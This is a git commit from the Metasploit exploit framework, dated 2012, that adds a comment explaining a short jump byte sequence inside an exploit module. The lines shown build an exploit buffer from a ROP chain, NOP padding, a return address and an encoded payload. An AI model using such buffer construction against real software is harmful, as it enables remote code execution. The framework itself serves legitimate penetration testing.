Comment what \x0b\x04 is for

unstable
sinn3r 2012-02-22 22:59:43 -06:00
parent 92c801d936
commit 144fa0dc0e
1 changed files with 1 additions and 1 deletions

View File

@ -113,7 +113,7 @@ class Metasploit3 < Msf::Exploit::Remote
pay = rop_chain
pay << make_nops(374 - rop_chain.length)
pay << "\xeb\x04"
pay << "\xeb\x04" #Short jmp 0x04
pay << [target.ret].pack('V')
pay << payload.encoded